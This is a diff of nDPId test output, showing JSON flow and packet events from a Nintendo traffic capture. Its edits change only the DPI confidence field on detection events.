00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1500731320644,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320644,"pkt":"AA6OGXEMfLuKifuECABFAABYEUEAAEARTg7AqAxyWwjzI8uXwRgARM2+MquYZAJWA8uWATPgxkj4NJP7aMnpzfBBRQUJGYsmvR+Tfti6\/9NW0mVVtdYfmAlO0lOZx8+qpE3Q9Qrr"} 
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320644,"flow_last_seen":1500731320644,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320644,"flow_last_seen":1500731320644,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1500731320732,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320732,"pkt":"fLuKifuEAA6OGXEMCABFAABY97kAADIRdZVbCPMjwKgMcsEYy5cARD+fMquYZAJwBDs0OpYMdoXMEb7z5ADj1gGyYiTWHIsmvR+Tfti6\/9NW0mVVtdYcxe3DWV6ogDbeCRSMhnlF"} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320764,"flow_last_seen":1500731320764,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320764,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1500731320764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320764,"pkt":"AA6OGXEMfLuKifuECABFAABYEUIAAEARHhzAqAxyhgP4GcuX3nsARKmOMquYZAL7A4GWfECoPkHlkau7Ijb2F2MvtOU+dosmvR+Tfti6\/9NW0mVVtday4XIk1NfCl4ZHAO\/1Fxpd"} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320764,"flow_last_seen":1500731320764,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320764,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320764,"flow_last_seen":1500731320764,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320764,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320774,"flow_last_seen":1500731320774,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320774,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1500731320774,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320774,"pkt":"AA6OGXEMfLuKifuECABFAABYEUMAAEARMBfAqAxybRX\/C8uXxEsARC8cMquYZAJGA3KWhoRABV3FWfmtjLEwkvqReL4g94smvR+Tfti6\/9NW0mVVtdahZ4Yi8EkEbE+Cf5dTG6Dk"} 
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320774,"flow_last_seen":1500731320774,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320774,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320774,"flow_last_seen":1500731320774,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320774,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1500731320842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320842,"pkt":"fLuKifuEAA6OGXEMCABFAABYEicAADMRKjeGA\/gZwKgMct57y5cARE+8MquYZAIZA8hA\/JaGDMK+3tfYvFe22fqmgHrRaYsmvR+Tfti6\/9NW0mVVtdaFuHgj\/oXYMvE1kVZddtPK"} 
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1500731320881,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320881,"pkt":"fLuKifuEAA6OGXEMCABFAABYK0gAADIRJBJtFf8LwKgMcsRLy5cARH7BMquYZAKvA36Er5aJDtEHqQojRhZUoJvCATzcAYsmvR+Tfti6\/9NW0mVVtdYSzDno2v3JjwLx3wkvum1y"} 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1500731320971,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1500731320971,"pkt":"fLuKifuEAA6OGXEMCABFAAC497sAADIRdTNbCPMjwKgMcsEYy5cApCSHMquYZAJwBDw1LZb\/EXOjSMMnhE7iZD46YMnDknY2Toj8H3hexFk8t\/NxtrnGBe7\/azeV+ylrxOZLEJSeqtaVZpj8qkFUmEqDrAokbYC5tpC2hu85m1Gapy+z4MYRc6NIwyeETuJkPjpgycOS4O1pGafPZccfGHcxxjvnUp7EdqfBF4phVhM5G67auDF2qW+tEyxBQPI1F2LvuWv4"} 
@@ -17,28 +17,28 @@ 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1500731320980,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1500731320980,"pkt":"AA6OGXEMfLuKifuECABFAAC4EUYAAEARL7TAqAxybRX\/C8uXxEsApGfqMquYZAJGA3OXVoUOaa8xKMh3YxOqQfCOROhuZZ1cluqPszGtOrY8\/h+Ka05RJidBwdgpJSzxyPBzPUj\/QCqQX5N8LEBCJOczUrsTufJdxx5Y+oG3liR0QxxR9FdprzEoyHdjE6pB8I5E6G5l7EcDtxNE8JSi4yBs1WWoHG7r\/Cy+MHjWKN4dY\/SnlSlX+kXE8MPCEZprJe3ihEAS"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731322454,"flow_last_seen":1500731322454,"flow_idle_time":7580000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1500731322454,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1500731322454,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1500731322454,"pkt":"fLuKifuEAA6OGXEMCABFAACYFZdAAOUGcTo2uwq5wKgMcgG7vMgz\/J5Zi2972IAYALkcKwAAAQEICgQM20EAGkXPFwMDAF\/eldsI13HzPlUjJzvSUWyEIzWGgbOyhWxdkIHfN3lgjdjjc7JiXYu\/ooQ\/gzWIbwSHhgUl7CbzYWzRlB2Fe4u0GxVFMrAIoxb4XR3ehSS5gi8Kq9fYRepj92tegMbl5w=="} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731322454,"flow_last_seen":1500731322454,"flow_idle_time":7580000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1500731322454,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731322454,"flow_last_seen":1500731322454,"flow_idle_time":7580000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1500731322454,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1500731322460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1500731322460,"pkt":"AA6OGXEMfLuKifuECABFAABnEVxAAEAGGqfAqAxyNrsKubzIAbuLb3vYM\/yevYAYBAhG+gAAAQEICgAaYTYEDNtBFwMDAC4AAAAAAAAAKH6viddQUv6VCP9kwNVv1cM5qFQr1yPk5rVuTEPwOaETSFnM6WhQ"} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1500731322761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731322761,"pkt":"fLuKifuEAA6OGXEMCABFAAA0FZhAAOUGcZ02uwq5wKgMcgG7vMgz\/J69i298C4AQALmNxAAAAQEICgQM25wAGmE2"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1500731323269,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731323269,"pkt":"AA6OGXEMfLuKifuECABFAABoEV8AAEARLjHAqAxyI55KPcuXgjcAVAoAMquYZAIAAACgRQAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjfL9\/FaWie4QujpeJZMzmHA=="} 
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1500731323270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731323270,"pkt":"AA6OGXEMfLuKifuECABFAABoEWAAAEARLjDAqAxyI55KPcuXgjcAVAoAMquYZAIAAACgRQAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjfL9\/FaWie4QujpeJZMzmHA=="} 
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1500731323270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731323270,"pkt":"AA6OGXEMfLuKifuECABFAABoEWEAAEARLi\/AqAxyI55KPcuXgjcAVCUqMquYZAIAAACgRgAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjeofEEG4mAZPKsmIYZ3XQPw=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":200000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"thread_ts_msec":1500731326270,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01394{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1500731326270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":730,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":730,"pkt_l4_len":696,"thread_ts_msec":1500731326270,"pkt":"AA6OGXEMfLuKifuECABFAALMEW8AAEARl9zAqAxyNArNscuXhicCuLNGMquYZAEAAACsAAAACAICgAAAAAAAZU1IgACGJwAAAAAPAfz\/AmL\/\/\/\/\/\/\/\/\/\/\/\/\/DNhnHrgUDeqh96EJudpqr7HTWmwuyiNXAoN8EJ3L9Q9BYy53b12QoycQBbgF0+MGumCDqya3DRDi\/FgfUDp8jmtF0eLtdJawWMd0Uh7gRi0nJAedvr+L4LDG+1PkKHdQjXkwcc63uSwXLbhZGs5rZ8pLuCki3H7JLOG5CI96WiAzLSOgOT5MmMOkBR9lHnUbly8I57OvnsPjzu2ZoGj750rOuJoq4PDp+HTtcuUkR\/yuCERU5DE5fS3WD79Od2EljENI\/Aj0rbyEoWaVKXUGbMeIN\/PHtUKEKwxkiH\/DZpj\/dOZVZle2A+wpaUtVb5Kkq8m0M0sj8U0Nr8\/f9iy5nCcQHobd29hf9qcfXx\/tCnteI0cP0tyykizOxpnlPK2I0STXsPD0wxOnU\/OOfu8Wm3V94s2PEbCeAbRx8PvXHbjtAm8AnmQMBMeFM6TQwwpijOYTfaXxrgmiFU\/AHPdepp0ILcWD5QSKt4MWDsJ\/eC61SjGvCVRvXn2JW5KB\/4JQcfZHw4S\/auTmIFCllOyidDXFohQ4NU8A9vt0e5qrI\/cou3U09qQhgu6ncsvX+jQusCyJhx1EpdaFLaOseb4xo0IjeHtTg5uKzMiP+l3dg6BJfcICpsS0fKy4Lvcxzq4iHlV\/CkZw5k\/5qPEe1WClYIIYAQ1QuHKqZOMgl0qEP1biit38pQoNuI5A\/WZ4yptUyrSpaVacwxp5yZkU47ddcg7lId\/wkwQjzVN9BmlVIcEupSyiP64T8RypU57m5OsmKDUV8cUXr\/nGnwi\/96TbsG+A6i29VkTJzG6j04DbRd\/2rnSbi4lJUC2\/\/AUQQJGvBPVxZ\/JcWHrRv6UUWsmJyg=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1500731326599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1500731326599,"pkt":"AA6OGXEMfLuKifuECABFAABgEXIAAEARz1fAqAxywKgMAUm6ADUATBSXAEkBAAABAAAAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAE="} -00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": 
{"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1500731326628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1500731326628,"pkt":"fLuKifuEAA6OGXEMCABFAAELMF9AAEARb7\/AqAwBwKgMcgA1SboA95AtAEmBgAABAAkAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAHADAAFAAEAAAAeAB8OZDNmdGhwdnY3Znp4MDAKY2xvdWRmcm9udANuZXQAwFAAAQABAAAAPAAENsAb2cBQAAEAAQAAADwABDbAG8TAUAABAAEAAAA8AAQ2wBsnwFAAAQABAAAAPAAENsAbUcBQAAEAAQAAADwABDbAG0rAUAABAAEAAAA8AAQ2wBuuwFAAAQABAAAAPAAENsAbaMBQAAEAAQAAADwABDbAGwg="} -00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731326628,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.217"}} 
+00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731326628,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.217"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326644,"flow_last_seen":1500731326644,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731326644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 